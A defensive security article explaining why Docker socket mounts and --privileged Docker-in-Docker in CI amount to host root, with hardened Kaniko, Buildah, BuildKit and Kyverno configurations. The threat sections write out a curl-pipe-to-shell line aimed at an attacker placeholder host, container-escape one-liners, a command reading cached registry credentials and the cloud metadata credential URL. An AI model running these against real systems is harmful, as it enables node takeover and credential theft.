Docker-in-Docker and the Shared Kernel Double Bind: Why --privileged in CI Is Host Root

The Problem

Building container images in CI requires a container build tool running inside the CI environment, which in almost every modern Kubernetes-based CI system is itself a container. This creates a structural problem: how does a process running inside a container build another container image? Three patterns emerged historically. The first two are security disasters, and understanding how they became the default explains why they remain widespread.

Pattern 1: Docker Socket Mount

The CI job container has /var/run/docker.sock mounted from the host. Any docker build, docker push, or docker run command inside the CI job connects directly to the host Docker daemon via the Unix domain socket. This is not Docker-in-Docker — there is no inner Docker daemon — but it is strictly worse from a security perspective because the docker CLI binary in the container is just a thin client: all operations execute in the context of the host daemon running as root.

What this concretely grants to the CI job:

Arbitrary privileged container creation on the host. docker run --privileged -v /:/host alpine chroot /host runs as root with full host filesystem access. One command, executed from inside the CI container, gives you a root shell on the Kubernetes node.
Full read access to all running containers’ environments. docker inspect against any container ID on the host returns the full environment variable set for that container, including secrets injected as environment variables by Kubernetes, CI orchestrators, or other build jobs.
Host credential access. Registry credentials for Docker Hub, ECR, GCR, or other registries are commonly cached on the node in /root/.docker/config.json. The daemon does not hand these out over its API, but a CI job with socket access can bind-mount the host path into a new container (docker run -v /root/.docker:/creds alpine cat /creds/config.json) and read them directly.
Full Docker API access. Volumes, networks, secrets (Docker Swarm secrets), configs — everything the Docker daemon manages is accessible.

The RUN steps in a Dockerfile execute inside ephemeral containers created by the daemon. If a Dockerfile contains RUN curl https://attacker.example.com/payload.sh | sh, that command runs in a container created by the host daemon, directly on the node and next to its other workloads, not inside a sandboxed nested container. Anything that executes in the CI job container itself (build scripts, dependency install hooks, test steps) can talk to the socket directly and use everything listed above.

This pattern became popular because it is simple: mount the socket, use docker build as-is. CI systems like early Jenkins pipelines and Docker Compose-based CI environments standardised on it. GitLab’s documentation recommended it for years. It remains the default in many internal CI configurations because engineers set it up five years ago and it worked, and no one audited the security implications.

Pattern 2: Docker-in-Docker (--privileged)

A Docker daemon runs inside the CI container. To give this inner daemon the kernel capabilities it needs — mounting overlay filesystems, manipulating cgroup hierarchies, creating network namespaces — the outer container is started with --privileged.

--privileged does three distinct things, each of which individually destroys container isolation:

Grants all Linux capabilities. A non-privileged container has a restricted capability set. --privileged adds CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_SYS_PTRACE, CAP_SYS_MODULE, and all other capabilities in the full set. CAP_SYS_ADMIN alone is effectively root: it allows mounting arbitrary filesystems and manipulating namespaces, among dozens of other privileged operations. CAP_SYS_MODULE allows loading kernel modules into the shared host kernel.
Disables seccomp filtering. The seccomp profile that restricts the system calls a container can invoke is removed entirely. Every system call in the kernel ABI is available to processes inside the container.
Disables AppArmor and SELinux MAC enforcement. The Mandatory Access Control profiles that constrain what files and devices a container can access are not applied.

The result is a container that shares the host kernel, sees the host’s devices under /dev, and has no meaningful restrictions beyond what the kernel itself imposes on a root process. A container with --privileged is not “root with elevated permissions”: it is root on the host, separated only by mount, PID, and network namespaces that it holds every capability needed to leave. Docker does not place the container in a user namespace by default, so UID 0 inside is UID 0 outside.
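Two of the three effects above are visible from inside a container in /proc/self/status: the effective capability mask (CapEff) and the seccomp mode (Seccomp, where 2 means a filter is active). The following is a minimal sketch of reading those signals, assuming the status text has already been captured; the function name isolation_signals is hypothetical, and the check does not cover AppArmor or SELinux, which are not reported in this file.

```python
# Bit positions from linux/capability.h
CAP_SYS_MODULE = 16
CAP_SYS_ADMIN = 21


def isolation_signals(status_text: str) -> dict:
    """Summarise capability and seccomp state from /proc/<pid>/status text."""
    fields = {}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()

    cap_eff = int(fields.get("CapEff", "0"), 16)
    seccomp_mode = int(fields.get("Seccomp", "0"))
    return {
        "cap_sys_admin": bool((cap_eff >> CAP_SYS_ADMIN) & 1),
        "cap_sys_module": bool((cap_eff >> CAP_SYS_MODULE) & 1),
        # 0 = disabled, 1 = strict, 2 = filter (what container runtimes use)
        "seccomp_filtering": seccomp_mode == 2,
    }


if __name__ == "__main__":
    with open("/proc/self/status") as handle:
        print(isolation_signals(handle.read()))
```

A container started with Docker's default settings typically reports no CAP_SYS_ADMIN and an active seccomp filter; a --privileged container reports the opposite on both counts.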

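The security distinction between --privileged DinD and the socket mount pattern is narrow in practice: the socket mount is a direct path to the host daemon; --privileged DinD provides a slightly indirect path via kernel CVE exploitation or direct namespace and device manipulation. If the container also shares the host PID namespace (--pid=host, or hostPID: true in a pod spec), nsenter --target 1 --mount --uts --ipc --net --pid -- bash joins the namespaces of PID 1 (host init) from inside the container. Without host PID sharing, PID 1 is the container’s own init, but the escape is barely harder: --privileged exposes the host’s block devices, so the node’s root filesystem can be mounted directly. Both are documented, trivial escapes requiring zero kernel vulnerabilities.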

The DinD pattern was popularised by Jérôme Petazzoni’s 2013 work on running Docker inside Docker. The same author later wrote a follow-up, “Using Docker-in-Docker for your CI or testing environment? Think twice.”, explicitly recommending against it for CI use. GitLab’s own documentation for their Docker executor still recommends privileged = true in the runner configuration as the supported approach for building Docker images. This is documented host compromise as an official configuration.

Pattern 3: The Correct Approach

Three production tools build OCI-compliant container images without requiring a Docker daemon, without --privileged, and without mounting the host socket. All three operate in userspace and use only unprivileged kernel facilities.

Kaniko (Google, 2018): Reads a Dockerfile and builds layers directly in userspace by unpacking base image layers to a directory, executing RUN commands with chroot into that directory, and snapshotting filesystem changes between steps using file modification timestamps and hash comparisons. The built image is pushed directly to a registry. Kaniko does not start a Docker daemon. The executor container does run as root inside the container (it needs to chroot and manipulate filesystem ownership), but it does not require --privileged and does not require kernel mount operations. The container can drop all Linux capabilities except those strictly needed for chroot operations.

Buildah (Red Hat, 2017): Builds OCI images without a daemon, supports rootless mode using kernel user namespace remapping (newuidmap/newgidmap). In rootless mode, the build process runs as a non-root user on the host and uses user namespace remapping to simulate root inside the build environment. Buildah supports a --isolation chroot mode that replaces kernel namespace creation with plain chroot, enabling builds in environments that do not permit user namespace creation. Buildah also supports OCI and Docker image formats, multiple transport protocols, and scripted builds via shell scripts rather than Dockerfiles.

BuildKit in rootless mode (Moby, docker/buildx): BuildKit is the build backend for docker buildx and can run as a standalone daemon (buildkitd) in rootless mode. Rootless BuildKit runs the build daemon as a non-root user using user namespaces, with no privileged operations required. The --oci-worker-no-process-sandbox flag gives up PID namespace isolation between build steps and the daemon so that BuildKit can run inside an unprivileged container: lower isolation but broader compatibility. Rootless mode is opt-in. The default moby/buildkit image runs buildkitd as root, the buildx docker-container driver starts its BuildKit container privileged, and the rootless variant ships under the -rootless image tags.

Threat Model

Docker socket mount — full host daemon access from any RUN step. The attack surface is every line of a Dockerfile, every build dependency pulled during the build, and every environment variable injected into the build environment. A poisoned base image (FROM malicious-base:latest) that has replaced a binary with a backdoored version will execute during the build with access to the host Docker socket. A compromised npm package pulled during RUN npm install executes its install scripts with socket access. A supply chain compromise upstream of the build — a poisoned layer in any transitive base image — executes with full host daemon access. The attacker does not need to compromise the CI infrastructure; they need to compromise one artifact in the build’s dependency graph.

--privileged DinD — kernel CVE exploitation reaches the Kubernetes node directly. CVE-2022-0847 (Dirty Pipe) demonstrated the class of vulnerability relevant here: a kernel vulnerability exploitable from inside a container that grants overwrite access to arbitrary read-only files, including the host’s /etc/passwd, /proc/sched_debug, and SUID binaries. Dirty Pipe was exploitable from inside --privileged containers — the container shares the kernel, so kernel vulnerabilities have the same exploitability profile as from the host. An attacker running arbitrary code inside the inner Docker environment (via a compromised build step) can exploit kernel vulnerabilities to reach the outer host without needing a container escape first, because --privileged has already removed the barriers.

The namespace escape requires no kernel vulnerability. A process inside a --privileged container that shares the host PID namespace can join the host’s namespaces with a single nsenter call; without PID sharing, mounting the host’s root block device takes approximately two commands. This is not exploitation: it is intended kernel functionality working correctly.

Node compromise in a shared build cluster — the blast radius is every secret on the node. In a Kubernetes cluster where multiple teams’ build jobs run on shared nodes, one compromised build job that achieves host access on its node can access:

All other pods’ environment variables. crictl inspect <pod-id> on the node returns environment variables for every running pod, including those in different namespaces. In a busy build cluster, this includes other teams’ GITHUB_TOKENs, AWS credentials, Docker Hub passwords, and deployment keys currently in use.
Kubelet credentials. The kubelet’s client certificate and key are stored on the node at /var/lib/kubelet/pki/. These credentials authenticate to the Kubernetes API server with the node’s identity. Depending on RBAC configuration, the node identity may permit reading secrets across namespaces.
Cloud IMDS credentials. Cloud providers’ Instance Metadata Service endpoints (169.254.169.254 for AWS, Azure; metadata.google.internal for GCP) are accessible from the node and return credentials scoped to the node’s IAM role. The node IAM role in many Kubernetes deployments has broad permissions to support node operations. In AWS, this typically includes ecr:GetAuthorizationToken and may include s3:*, secretsmanager:GetSecretValue, or broader IAM permissions depending on how the cluster was configured.
Registry credentials cached on the node. Docker and containerd cache registry authentication tokens. On a node that has pulled images from ECR, the cached token from /root/.docker/config.json or containerd’s credential cache grants docker pull access to every image in the account until the token expires.

GitLab CI Docker executor with privileged = true. GitLab’s official documentation for building Docker images in CI pipelines using the Docker executor reads: “Make the Docker executor privileged.” The config.toml snippet provided in the documentation contains privileged = true. This configuration applies to all jobs on that runner, not just image-building jobs. Any job that runs on a privileged runner — including jobs that do nothing more than run unit tests — runs in a --privileged container with full host access. GitLab groups can contain hundreds of repositories, and runners are frequently shared. A malicious actor who can push a branch to any repository in the group can trigger a CI job on the privileged runner, escape to the host, and access secrets from all other concurrent jobs.

Supply chain via poisoned base image with socket access. A build pipeline that uses FROM python:3.12-slim and mounts the Docker socket is trusting the security of the python image on Docker Hub, the security of Docker Hub’s image signing infrastructure, and the security of every layer in the image’s history. The python:3.12-slim image has hundreds of transitive dependencies. A compromise of any layer that executes code during the build (e.g., via a package manager in the base image that runs scripts) gives socket access. The Codecov breach (2021) demonstrated that even widely-trusted CI tooling with millions of installations can be compromised to exfiltrate credentials. A similarly-scoped compromise of a base image used in a socket-mounted build environment gives full host access rather than credential exfiltration.

Hardening Configuration

1. Kaniko in Kubernetes — No Privileged Required

Kaniko runs as a Kubernetes Pod with no special privileges. Registry credentials are passed via a Kubernetes Secret mounted as a volume.

apiVersion: v1
kind: Secret
metadata:
  name: registry-credentials
  namespace: ci-builds
type: kubernetes.io/dockerconfigjson
data:
  .dockerconfigjson: <base64-encoded-docker-config-json>
---
apiVersion: v1
kind: Pod
metadata:
  name: kaniko-build
  namespace: ci-builds
spec:
  initContainers:
  - name: git-clone
    image: alpine/git:latest
    command:
    - git
    - clone
    - https://github.com/myorg/myrepo
    - /workspace
    volumeMounts:
    - name: workspace
      mountPath: /workspace
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
  containers:
  - name: kaniko
    image: gcr.io/kaniko-project/executor:v1.23.0
    args:
    - "--dockerfile=/workspace/Dockerfile"
    - "--context=dir:///workspace"
    - "--destination=myregistry.io/myimage:latest"
    - "--cache=true"
    - "--cache-repo=myregistry.io/myimage/cache"
    - "--cleanup"
    volumeMounts:
    - name: workspace
      mountPath: /workspace
    - name: registry-credentials
      mountPath: /kaniko/.docker
    securityContext:
      # Kaniko requires root inside the container for chroot operations,
      # but does NOT require --privileged or any elevated capabilities
      runAsNonRoot: false
      runAsUser: 0
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
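        # Kaniko needs CHOWN, FSETID, and DAC_OVERRIDE to write files and set
        # ownership in built image layers. Some Dockerfiles need more (for
        # example FOWNER, SETUID, or SETGID when RUN steps invoke package
        # managers); add those only when a build fails without them.
        add: ["CHOWN", "FSETID", "DAC_OVERRIDE"]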
      seccompProfile:
        type: RuntimeDefault
  volumes:
  - name: workspace
    emptyDir: {}
  - name: registry-credentials
    secret:
      secretName: registry-credentials
      items:
      - key: .dockerconfigjson
        path: config.json
  restartPolicy: Never
  serviceAccountName: kaniko-builder
  automountServiceAccountToken: false

Key points: allowPrivilegeEscalation: false prevents the executor from gaining additional privileges beyond what it starts with. seccompProfile: RuntimeDefault applies the container runtime’s default seccomp profile, restricting available system calls to a vetted list. No hostPath volumes. No socket mount. automountServiceAccountToken: false prevents the build pod from authenticating to the Kubernetes API — the build job does not need cluster access.

For temporary credentials (AWS ECR, GCR with Workload Identity), use a credential helper as an init container that writes a short-lived config.json to a shared emptyDir volume:

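initContainers:
- name: ecr-credentials
  image: amazon/aws-cli:latest
  command:
  - sh
  - -c
  - |
    # ECR expects base64("AWS:<password>") in the auth field.
    # Built with printf and base64 so the image needs no jq.
    auth="$(printf 'AWS:%s' "$(aws ecr get-login-password --region us-east-1)" | base64 | tr -d '\n')"
    printf '{"auths":{"123456789.dkr.ecr.us-east-1.amazonaws.com":{"auth":"%s"}}}\n' "$auth" \
      > /kaniko/.docker/config.json
  volumeMounts:
  - name: docker-config
    mountPath: /kaniko/.docker
  securityContext:
    # The image defaults to root, so runAsNonRoot needs an explicit UID
    runAsNonRoot: true
    runAsUser: 1000
    allowPrivilegeEscalation: false
    capabilities:
      drop: ["ALL"]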
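The format of the generated file is easy to get wrong: the auth field of a Docker config.json is the base64 encoding of username:password, and for ECR the username is the literal string AWS. The following is a minimal sketch of building that file, assuming the password has already been obtained from aws ecr get-login-password; the function name and the registry host in the usage example are placeholders.

```python
import base64
import json


def ecr_docker_config(registry: str, password: str) -> str:
    """Return config.json content granting access to one ECR registry."""
    # Docker's auth field is base64("<username>:<password>"); ECR's username is "AWS"
    auth = base64.b64encode(f"AWS:{password}".encode()).decode()
    return json.dumps({"auths": {registry: {"auth": auth}}})


if __name__ == "__main__":
    # Placeholder registry host and token, for illustration only
    print(ecr_docker_config("123456789.dkr.ecr.us-east-1.amazonaws.com", "example-token"))
```

Encoding the token alone, without the AWS: prefix, produces a file that parses correctly but fails registry authentication.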

2. Buildah Rootless in GitLab CI

Buildah supports a chroot isolation mode that avoids kernel namespace creation entirely. Combined with the vfs storage driver, this produces builds that work inside standard unprivileged containers.

# .gitlab-ci.yml
build:
  image: quay.io/buildah/stable:v1.35.0
  variables:
    # chroot isolation: use chroot(2) instead of creating kernel namespaces.
    # Works in unprivileged containers. Slightly less isolation than
    # namespace-based isolation but requires no special kernel permissions.
    BUILDAH_ISOLATION: chroot
    # vfs storage driver: plain directory tree with full copies between layers.
    # No overlay mount operations, no kernel mount capabilities required.
    # Significantly slower than overlay but works without privileges.
    STORAGE_DRIVER: vfs
    # Write images in OCI format rather than Docker v2 format
    BUILDAH_FORMAT: oci
  script:
  - buildah bud --isolation chroot --storage-driver vfs -t myimage:latest .
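  # Folded scalars (>) join the lines with spaces; trailing backslashes inside
  # a plain YAML scalar would reach the shell as escaped spaces.
  - >
    buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD"
    myimage:latest
    docker://myregistry.io/myimage:$CI_COMMIT_SHORT_SHA
  - >
    buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD"
    myimage:latest
    docker://myregistry.io/myimage:latest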

The BUILDAH_ISOLATION=chroot variable tells Buildah to use chroot(2) for build step isolation rather than creating new user, mount, and network namespaces. This is less isolation than full namespace separation: processes inside RUN steps share the PID namespace and network interfaces of the CI job container. The job container itself remains an ordinary unprivileged container, so the node is no more exposed than it is to any other unprivileged job, and the build requires no elevated kernel permissions.

STORAGE_DRIVER=vfs tells Buildah to use plain directory copies between layers rather than overlay filesystem mounts. This means each layer is a full copy of the previous layer’s directory tree rather than a copy-on-write overlay. For large images (e.g., images with a 1 GB base layer), this increases build time and disk usage substantially. For small images, the difference is acceptable.

For environments where user namespaces are available (kernels with CONFIG_USER_NS=y and kernel.unprivileged_userns_clone=1), Buildah rootless with overlay provides better performance and the stronger isolation of namespace separation:

# /etc/containers/storage.conf inside the Buildah container image
# (configure via a custom image or mounted configmap)
[storage]
driver = "overlay"
[storage.options.overlay]
mount_program = "/usr/bin/fuse-overlayfs"

fuse-overlayfs implements overlay filesystem semantics in userspace via FUSE, avoiding the kernel-level mount(2) operations that require privileges.

3. BuildKit Rootless in GitHub Actions and Self-Hosted Runners

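docker/build-push-action builds with BuildKit through docker buildx. On GitHub-hosted ubuntu-* runners the builder is not rootless: the Docker daemon runs as root and the docker-container driver starts buildkitd in a privileged container. The isolation boundary there is the runner itself, an ephemeral single-tenant VM that is discarded after the job. That boundary does not exist on shared self-hosted runners, which need the explicit rootless setup shown after the workflow.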

# .github/workflows/build.yml
name: Build and Push Image

on:
  push:
    branches: [main]

permissions:
  contents: read
  id-token: write  # Required for OIDC registry authentication

jobs:
  build:
    runs-on: ubuntu-24.04
    steps:
    - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
      # actions/checkout v4.2.2 pinned by SHA

    - name: Configure AWS credentials via OIDC
      uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
      with:
        role-to-assume: arn:aws:iam::123456789:role/ci-image-push
        aws-region: us-east-1

    - name: Login to Amazon ECR
      id: ecr-login
      uses: aws-actions/amazon-ecr-login@062b18b96a7aff071d4dc91bc00c4c1a7945b076

    - name: Set up Docker Buildx
      uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2
      with:
        # Run BuildKit in its own container, pinned to a known version.
        # This driver does not make the builder rootless; on GitHub-hosted
        # runners the isolation boundary is the ephemeral runner VM.
        driver: docker-container
        driver-opts: |
          image=moby/buildkit:v0.18.2
          network=host

    - name: Build and push
      uses: docker/build-push-action@14487ce63c7a62a4a324b0bfb37086795e31c6c1
      with:
        context: .
        push: true
        tags: |
          ${{ steps.ecr-login.outputs.registry }}/myimage:${{ github.sha }}
          ${{ steps.ecr-login.outputs.registry }}/myimage:latest
        cache-from: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache
        cache-to: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache,mode=max
        provenance: true
        sbom: true

For self-hosted runners where rootless mode needs explicit configuration, create a rootless BuildKit builder manually:

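# On the self-hosted runner host, as a user allowed to talk to Docker.
# The buildx docker-container driver starts its BuildKit container
# privileged, so run the rootless image directly and attach buildx to it.
# seccomp, AppArmor, and /proc masking are relaxed so rootlesskit can set up
# user namespaces; the container itself stays unprivileged.
docker run -d --name buildkitd-rootless \
  --security-opt seccomp=unconfined \
  --security-opt apparmor=unconfined \
  --security-opt systempaths=unconfined \
  moby/buildkit:v0.18.2-rootless

docker buildx create \
  --name rootless-builder \
  --driver remote \
  docker-container://buildkitd-rootless \
  --use

# Verify the builder runs without --privileged
docker inspect buildkitd-rootless \
  --format '{{ .HostConfig.Privileged }}'
# Expected output: false

# Verify no capability additions
docker inspect buildkitd-rootless \
  --format '{{ .HostConfig.CapAdd }}'
# Expected output: []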

For environments that cannot unmask /proc for the BuildKit container (many hardened Kubernetes configurations, for example), the --oci-worker-no-process-sandbox flag runs BuildKit build steps without a private PID namespace. The flag is an argument to buildkitd, not an environment variable:

docker run -d --name buildkitd-compatible \
  --security-opt seccomp=unconfined \
  --security-opt apparmor=unconfined \
  moby/buildkit:v0.18.2-rootless \
  --oci-worker-no-process-sandbox

docker buildx create \
  --name compatible-builder \
  --driver remote \
  docker-container://buildkitd-compatible \
  --use

This reduces isolation: build steps share the PID and network namespaces of the BuildKit daemon rather than running in isolated namespaces. It is still substantially more secure than --privileged DinD because the daemon itself runs without elevated host privileges.

4. OPA/Kyverno Policy: Block Docker Socket Mounts and --privileged at Admission

Admission control prevents the configuration from ever reaching production. Deploy as a Kyverno ClusterPolicy in Enforce mode so that pods violating the policy are rejected at the API server rather than audited after the fact.

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-privileged-builds
  annotations:
    policies.kyverno.io/title: Block Privileged Containers and Docker Socket Mounts
    policies.kyverno.io/description: >
      Privileged containers and Docker socket mounts grant full host access.
      Image builds must use Kaniko, Buildah, or rootless BuildKit.
spec:
  validationFailureAction: Enforce
  background: true
  rules:
  - name: block-privileged
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: >
        Privileged containers are not permitted. Use Kaniko, Buildah with
        BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
        See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/
      pattern:
        spec:
          =(initContainers):
          - =(securityContext):
              =(privileged): "false"
          containers:
          - =(securityContext):
              =(privileged): "false"
          =(ephemeralContainers):
          - =(securityContext):
              =(privileged): "false"

  - name: block-docker-socket-hostpath
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: >
        Mounting /var/run/docker.sock grants full host Docker daemon access.
        Remove the hostPath volume mount and use Kaniko or Buildah for image builds.
      deny:
        conditions:
          any:
          - key: "/var/run/docker.sock"
            operator: AnyIn
            value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
          - key: "/run/docker.sock"
            operator: AnyIn
            value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"

  - name: block-containerd-socket-hostpath
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: >
        Mounting the container runtime socket (/run/containerd/containerd.sock)
        grants host container runtime access equivalent to Docker socket access.
      deny:
        conditions:
          any:
          - key: "/run/containerd/containerd.sock"
            operator: AnyIn
            value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"

  - name: require-drop-all-capabilities
    match:
      any:
      - resources:
          kinds: [Pod]
          namespaces: [ci-builds]
    validate:
      message: >
        All containers in the ci-builds namespace must drop ALL capabilities.
        If a specific capability is required, add it explicitly with justification.
      pattern:
        spec:
          containers:
          - securityContext:
              capabilities:
                drop: ["ALL"]

The policy also blocks /run/containerd/containerd.sock mounts. Mounting the containerd socket is equivalent to mounting the Docker socket — it provides direct access to the container runtime’s gRPC API, which can be used to create privileged containers, read container filesystem contents, and inject processes into running containers.
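The same checks can be run against manifests before they reach the cluster, for example in a pre-merge pipeline step. The following is a minimal sketch that mirrors the intent of the privileged and socket-mount rules on an already-parsed Pod manifest; it is not Kyverno's evaluation logic, and the violations helper and sample pod are hypothetical.

```python
RUNTIME_SOCKETS = {
    "/var/run/docker.sock",
    "/run/docker.sock",
    "/run/containerd/containerd.sock",
}


def violations(pod: dict) -> list:
    """Return human-readable findings for a Pod manifest parsed into a dict."""
    spec = pod.get("spec") or {}
    found = []
    for group in ("initContainers", "containers", "ephemeralContainers"):
        for container in spec.get(group) or []:
            security = container.get("securityContext") or {}
            if security.get("privileged") is True:
                found.append(f"privileged container: {container.get('name')}")
    for volume in spec.get("volumes") or []:
        path = (volume.get("hostPath") or {}).get("path")
        if path in RUNTIME_SOCKETS:
            found.append(f"runtime socket hostPath: {path}")
    return found


if __name__ == "__main__":
    dind_pod = {
        "spec": {
            "containers": [
                {"name": "dind", "securityContext": {"privileged": True}},
            ],
            "volumes": [
                {"name": "sock", "hostPath": {"path": "/var/run/docker.sock"}},
            ],
        }
    }
    for finding in violations(dind_pod):
        print(finding)
```

A check like this complements admission control rather than replacing it: it gives authors feedback earlier, while the cluster policy remains the enforcement point.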

Apply the policy and immediately test it:

# Apply the policy
kubectl apply -f block-privileged-builds.yaml

# Test: attempt to create a privileged pod — should be rejected
kubectl run test-privileged \
  --image=alpine \
  --overrides='{"spec":{"containers":[{"name":"test","image":"alpine","securityContext":{"privileged":true}}]}}' \
  --namespace=ci-builds

# Expected output:
# Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
# resource Pod/ci-builds/test-privileged was blocked due to the following policies
# block-privileged-builds/block-privileged:
#   Privileged containers are not permitted. Use Kaniko, Buildah with
#   BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.

5. Dedicated Build Namespace with Network Policy for Legacy Migrations

When a migration from --privileged builds cannot be completed immediately, contain the blast radius. Isolate build workloads on dedicated nodes with taints and apply network egress restrictions that prevent the build node from reaching internal services.

# Taint dedicated build nodes so only build pods schedule there
kubectl taint nodes build-node-1 build-node-2 \
  role=privileged-builds:NoSchedule

# Label the nodes
kubectl label nodes build-node-1 build-node-2 \
  node-role=privileged-builds

# Toleration required on build pods to schedule on tainted nodes
spec:
  tolerations:
  - key: "role"
    operator: "Equal"
    value: "privileged-builds"
    effect: "NoSchedule"
  nodeSelector:
    node-role: privileged-builds
---
# NetworkPolicy: deny egress from ci-builds-legacy namespace to internal services
# Builds should only need to reach: git hosts, package registries, container registries
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: build-egress-restrictions
  namespace: ci-builds-legacy
spec:
  podSelector: {}
  policyTypes: [Egress]
  egress:
  # Allow DNS
  - ports:
    - port: 53
      protocol: UDP
    - port: 53
      protocol: TCP
  # Allow HTTPS to external hosts only (package registries, git hosts,
  # container registries). A rule with ports but no "to" block would allow
  # port 443 to every destination, including the Kubernetes API server.
  # Private ranges and the IMDS address are excluded here; adjust the except
  # list to match the cluster's pod, service, and node CIDRs.
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 10.0.0.0/8
        - 172.16.0.0/12
        - 192.168.0.0/16
        - 169.254.169.254/32
    ports:
    - port: 443
      protocol: TCP

The IMDS block is important. If a --privileged build escapes to the node, the first thing an attacker’s tooling will do is query http://169.254.169.254/latest/meta-data/iam/security-credentials/ to obtain temporary cloud credentials. While a NetworkPolicy does not constrain root processes that have escaped the container namespace, it does constrain network traffic from build pods that have not yet escaped — preventing a less sophisticated attack from reaching the IMDS without full container escape.
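Scoping egress by destination as well as port is usually expressed with an ipBlock that allows a wide CIDR and lists exceptions. The following is a minimal sketch of how such a rule evaluates a destination address, using only the standard ipaddress module; the exception ranges are assumptions standing in for a cluster's internal CIDRs, and egress_allowed is a hypothetical helper, not part of any Kubernetes client.

```python
import ipaddress

# Assumed exception list: private ranges plus the cloud metadata address
EXCEPT_CIDRS = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.169.254/32"]


def egress_allowed(destination: str, cidr: str = "0.0.0.0/0", excepts=EXCEPT_CIDRS) -> bool:
    """Evaluate an ipBlock-style rule: inside cidr and outside every exception."""
    address = ipaddress.ip_address(destination)
    if address not in ipaddress.ip_network(cidr):
        return False
    return not any(address in ipaddress.ip_network(block) for block in excepts)


if __name__ == "__main__":
    for dest in ("169.254.169.254", "10.96.0.1", "140.82.112.3"):
        print(dest, "allowed" if egress_allowed(dest) else "denied")
```

Running the candidate exception list through a check like this before applying the policy helps confirm that the metadata endpoint and the cluster's service range fall on the denied side.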

For the kubelet credential threat, there is no NetworkPolicy mitigation once a container has --privileged and has escaped to the node. The only mitigations are: use node-level RBAC to minimise what the kubelet identity can access, enable Kubernetes audit logging to detect anomalous API calls from node identities, and migrate off --privileged as a priority.

Expected Behaviour

Kaniko Build — No Privileged Capabilities

After creating the Kaniko build pod, inspect the container’s capability set:

# While the build is running. kubectl exec needs a cat binary in the image:
# use the executor's debug variant for this check, since the standard
# executor image ships no shell utilities.
kubectl exec kaniko-build -n ci-builds -- \
  cat /proc/self/status | grep Cap

# Expected output (capabilities dropped to minimum):
# CapInh: 0000000000000000
# CapPrm: 0000000000000013  # CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FSETID
# CapEff: 0000000000000013
# CapBnd: 0000000000000013
# CapAmb: 0000000000000000

Decode the hex value to confirm which capabilities are present:

capsh --decode=0000000000000013
# Output: 0x0000000000000013=cap_chown,cap_dac_override,cap_fsetid

Compare with a --privileged container:

# Inside a --privileged container
cat /proc/self/status | grep Cap

# CapPrm: 000001ffffffffff  # All capabilities
# CapEff: 000001ffffffffff

The full capability set (0x1ffffffffff) includes CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_NET_ADMIN, CAP_SYS_MODULE, and all others. The Kaniko container has only three, all scoped to filesystem ownership operations needed for correct layer construction.
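Where capsh is not installed, the mask can be decoded by hand: each capability is one bit, numbered as in linux/capability.h, so CAP_CHOWN (bit 0), CAP_DAC_OVERRIDE (bit 1), and CAP_FSETID (bit 4) together give 0x13. The following is a minimal sketch of that decoding; the name table covers capabilities 0 through 40, and decode_caps is a hypothetical helper.

```python
# Capability names indexed by bit number, as defined in linux/capability.h
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]


def decode_caps(mask: int) -> list:
    """Return the names of all capabilities whose bit is set in mask."""
    names = []
    for bit, name in enumerate(CAP_NAMES):
        if (mask >> bit) & 1:
            names.append(name)
    return names


if __name__ == "__main__":
    print(decode_caps(0x13))
    print(len(decode_caps(0x1FFFFFFFFFF)), "capabilities in the full set")
```

The width of the full mask depends on the kernel version, since capabilities have been added over time; 0x1ffffffffff corresponds to kernels that define 41 of them.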

Kyverno Policy Denial

When a CI job attempts to create a --privileged pod in the ci-builds namespace, the API server returns:

Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
resource Pod/ci-builds/my-dind-build was blocked due to the following policies

block-privileged-builds/block-privileged:
  Privileged containers are not permitted. Use Kaniko, Buildah with
  BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
  See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/

This message should appear in the CI job log and be immediately actionable: the job fails with a policy violation, not a vague permission error.

Verifying No Docker Socket Presence

In a correctly-configured Kaniko or Buildah pod, the Docker socket should not be present:

